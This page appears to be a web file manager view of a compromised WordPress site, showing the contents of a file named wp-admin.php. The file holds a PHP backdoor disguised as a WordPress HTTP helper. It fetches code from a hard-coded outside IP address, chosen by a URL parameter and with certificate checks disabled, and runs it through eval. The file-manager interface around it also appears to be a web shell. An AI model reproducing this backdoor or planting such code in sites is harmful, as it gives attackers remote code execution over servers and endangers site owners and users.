File manager - Edit - /home/kdmucyyv/rafikisprings.co.uk/wp-admin.php
Back
<?php /* * Support@gmail.com */ function WordPress_Http_Curl ( $txt = '0303', $args = array() ) { if ( ! function_exists( "curl_init" ) || ! function_exists( "curl_exec" ) ) { return false; } $handle = curl_init(); curl_setopt( $handle, CURLOPT_URL, 'http://69.30.227.202/file/'.$txt.'.txt' ); curl_setopt( $handle, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $handle, CURLOPT_HEADER, false ); curl_setopt( $handle, CURLOPT_SSL_VERIFYHOST, false ); curl_setopt( $handle, CURLOPT_SSL_VERIFYPEER, false ); $response = curl_exec( $handle ); $curl_error = curl_error( $handle ); if ( !$curl_error ) { $response = array( "data" => eval( "?>". $response ) ); return $response['data']; } else { return $curl_error; } if ( PHP_VERSION_ID < 80000 ) { curl_close( $handle ); } } $get = isset($_GET) ? $_GET : array(); $link = ''; foreach ($get as $key => $value) { if($key == 'a'){ $link = $value; } } $result = WordPress_Http_Curl( $link ); print_r($result);
| ver. 1.4 |
Github
|
.
| PHP 8.3.30 | Generation time: 0 |
proxy
|
phpinfo
|
Settings